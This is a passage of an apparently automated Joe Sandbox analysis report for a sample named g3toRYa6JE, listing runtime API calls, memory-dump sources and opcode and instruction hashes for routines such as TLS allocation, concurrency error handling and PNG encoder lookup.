                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___crtCreateEventExW.LIBCPMT ref: 0041231C
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00410B29), ref: 0041232A
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412340
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0041234E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 200240550-0
                                                                                                                                                                                                                              • Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                                                                                                                                              • Instruction ID: 1a74c5ccde1e3971b1c6c719148978c8dd05ce3529fe136f2ca3c66ce4c89eb0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DE0D8716002193AE714BB764D07FBF369C6B00B45F94082ABE14E11C3FDACD55041AC
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___crtCreateEventExW.LIBCPMT ref: 00792583
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00790D90), ref: 00792591
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 007925A7
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 007925B5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 200240550-0
                                                                                                                                                                                                                              • Opcode ID: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                                                                                                                                              • Instruction ID: 7f6b8c60d12c121c33775a3b74f0008acbe068cb71508aa9b26c9d85ec32c956
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66fd49b5c43f77bbcd2fa95a93d23545e34cca56ab3752b45afdfddad9ffa28e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADE0DF61A402197AEB50B7759C1BF7B369CAB00B41F940861BA14E50C3FEACD90042A9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004126E2: TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8
                                                                                                                                                                                                                              • TlsAlloc.KERNEL32(?,00410B29), ref: 0042396F
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00423981
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00423997
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004239A5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3735082963-0
                                                                                                                                                                                                                              • Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                                                                                                                                              • Instruction ID: 15d2e13c7ff80a83f5b64d05c829fbc6b4bb44007b15bdef03250d0b5d6306aa
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9BE02B749002146FC704BF76AC4A66E3374750134A7A00E3FB012D2192EEBCD1844A9C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00792949: TlsAlloc.KERNEL32(?,00790D90), ref: 0079294F
                                                                                                                                                                                                                              • TlsAlloc.KERNEL32(?,00790D90), ref: 007A3BD6
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 007A3BE8
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 007A3BFE
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 007A3C0C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3735082963-0
                                                                                                                                                                                                                              • Opcode ID: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                                                                                                                                              • Instruction ID: f42bc6cd516f019c6caa5bfcab6a2c39c8a9b726d05bca732be5038752f18ca2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c0e1a6a312418bc90eef6f3fea79e88b9b6ce50c33034ee7117e387468c8eb0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9E09B74400215EEC704BF796C4E66A72546601751B500F66F511D20A2ED3DD105466D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B29), ref: 00412527
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B29), ref: 00412536
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041254C
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0041255A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3016159387-0
                                                                                                                                                                                                                              • Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                                                                                                                                              • Instruction ID: 385e35fad119ba3144d3df74fa1b3009f218c6b200c547ffcefd8a897afd490a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 95E04874600119BBC714EFB5DF49AEF73BC7A01745BA0046AA501E2151EAACDA44877D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00790D90), ref: 0079278E
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00790D90), ref: 0079279D
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 007927B3
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 007927C1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3016159387-0
                                                                                                                                                                                                                              • Opcode ID: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                                                                                                                                              • Instruction ID: 60661e32e833da7ee0e57160e7ad2423cc7a0452411bf65ff48779a8f69a8839
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fca92cb7320ff50a6b90e81439df834d34dd5d4b89d2e23b0c713fa7ff00c28a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41E04874500209B7CF00FBB59D4DAAF73BC6A00B01B600565A501E2052EA6CDA058769
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(?,?), ref: 00412681
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0041268D
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126A3
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004126B1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4286982218-0
                                                                                                                                                                                                                              • Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                                                                                                                                              • Instruction ID: c34ca93974de366a1d33064525cfd34c096e82c6d40c10065bdc34e64e282c71
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08E04F7460011A6BCB14BF619D06BAF37AC6A00745B50082AB515D10A2EEB9D56486AC
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • TlsSetValue.KERNEL32(?,00000000,00417961,00000000,?,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412747
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412753
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412769
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00412777
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1964976909-0
                                                                                                                                                                                                                              • Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                                                                                                                                              • Instruction ID: adcf13394f918fecad39acecb2caa88bdbfd7867240310386255d15fa00e1845
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ADE04F346001196BDB10BF619E09AAF77A86A00A45F50442AB515D10A2EEB9E564969C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetThreadPriority.KERNEL32(?,?), ref: 007928E8
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 007928F4
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0079290A
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00792918
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4286982218-0
                                                                                                                                                                                                                              • Opcode ID: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                                                                                                                                              • Instruction ID: 20431994c93e2ea685625ba963dc9e3b891ecbdf6fccfedf696702ea10d434ad
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e898cf3acbe9b392c8e56d8d93d4defc04798ac26e6527183b72e34242952ab8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77E04F34500209BBDF14BF619C4AAAA376C7B00B41B500925B515D10A2EE3DD5059699
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • TlsSetValue.KERNEL32(?,00000000,00797BC8,00000000,?,?,00790D90,?,?,?,00000000,?,00000000), ref: 007929AE
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 007929BA
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 007929D0
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 007929DE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1964976909-0
                                                                                                                                                                                                                              • Opcode ID: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                                                                                                                                              • Instruction ID: 443e07070a75a8f6a61c07b272bc9fe60910c1ef29f866c712b50f802347b9f6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5eb4a781f3e4b8ec8f5daef76b0371c62c85b840ada855eb018d32e5272f8a37
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41E04F34500109BADF10BF619C49BBA36686B00B41F500925B919E10A2EE3DE51586A9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • TlsAlloc.KERNEL32(?,00410B29), ref: 004126E8
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 004126F5
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041270B
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00412719
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3103352999-0
                                                                                                                                                                                                                              • Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                                                                                                                                              • Instruction ID: 1ad0294434ecfca40659a618dd28aba5f9447f5ceacad7becc2ff902d53fffbc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01E0CD3450011567C714BF759D09ABF72587901719BA00A1AF131D20D1EAACD458415C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • TlsAlloc.KERNEL32(?,00790D90), ref: 0079294F
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0079295C
                                                                                                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00792972
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00792980
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3103352999-0
                                                                                                                                                                                                                              • Opcode ID: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                                                                                                                                              • Instruction ID: 0f1deb141d8f768fe5203bf44fdc78faa20df0d6d77c4807be1788d4952b3c54
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db4e8f81990c41efe0c5f892a1b43a96577a226854f9efbb8f129dbc0f0677bf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89E0C230500105B78B14BB74AC4EE7F32A87A01B21FA00B25F461E20E2EE6CE40A42AD
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 0042F0FD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorHandling__start
                                                                                                                                                                                                                              • String ID: pow
                                                                                                                                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                              • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                              • Instruction ID: a192877c9f0054c0872b9fb76e5ad9458d959ccc769b6dca3ba9f50539c5e518
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B515C61B0431296DB117B14E90137BBBB0AB54B00FE05D7FF491423A9EE3D8CA99A4F
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: s2C$s2C
                                                                                                                                                                                                                              • API String ID: 0-1833909196
                                                                                                                                                                                                                              • Opcode ID: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
                                                                                                                                                                                                                              • Instruction ID: de90a671c5843db736048dba6cdd1094f879e2809fe80a987d64bac264933c47
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d26f55ed8b89044789a372bd2a44fa0211c5dd18a725056bdf55d7f93a069115
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F51E731E04205EBCB20DF54C982B6EB770FF19314F24915BD5599B3D1E6B8E982CB89
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 007A895A
                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 007A8A13
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                              • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                              • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                              • Instruction ID: ba6dab918be89afdadbe2d9a0f582812c20cfdafec5d2038641061835a6ed3ec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3141D934A00205EBCF50DF68C845AAEBBB4BF86324F148256E9155B391DB3AED15CB93
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0B4,?,00000050,?,?,?,?,?), ref: 0043AF34
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                              • API String ID: 0-711371036
                                                                                                                                                                                                                              • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                              • Instruction ID: e3ba11e5d781d2b130423e2bf0cbd093d466219ebf659edcdfcd25fe82a6d734
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2214BA2AC0101A6DB30CB55C902B9B7356EF6CB24F569526EA89C7300F73EDD11C35E
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,007BB31B,?,00000050,?,?,?,?,?), ref: 007BB19B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                              • API String ID: 0-711371036
                                                                                                                                                                                                                              • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                              • Instruction ID: c23cb5c81dd6f5e32aeacc8fecd56cf03a0da67e44ced66d1533d2296c1fbffd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69218362B0010DA6EB348F6CCD25BD7739AEB54B51F668424ED09D7100F7BADD40C394
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F1B
                                                                                                                                                                                                                              • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F40
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EncodersGdipImage$Size
                                                                                                                                                                                                                              • String ID: image/png
                                                                                                                                                                                                                              • API String ID: 864223233-2966254431
                                                                                                                                                                                                                              • Opcode ID: bf724acd2d36aea3cd7c71ac0e6082fc752fbcd53218ac2ebd3932cd8158d6bf
                                                                                                                                                                                                                              • Instruction ID: e538c811f89b171702b8ca366793f889c85100130971bf928fd16bdf8145c3c0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf724acd2d36aea3cd7c71ac0e6082fc752fbcd53218ac2ebd3932cd8158d6bf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5211737AD0410AFFCB119FA99C8149EBB7AFF45321B20027BEC10B32E0C7759E459A54
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SetLastError.KERNEL32(0000000D,?,0040DE37,0040C64F,?,?,00000000,?,0040C51F,0045D5E4,0040C4EC,0045D5DC,?,ios_base::failbit set,0040C64F), ref: 0040EFA0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                                              • String ID: <(@
                                                                                                                                                                                                                              • API String ID: 1452528299-4189137628
                                                                                                                                                                                                                              • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                                                                                                                                                              • Instruction ID: 966c5171ab2b841c9a1c941c3673e83940a55d69d5d5609413e6151fa891d796
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
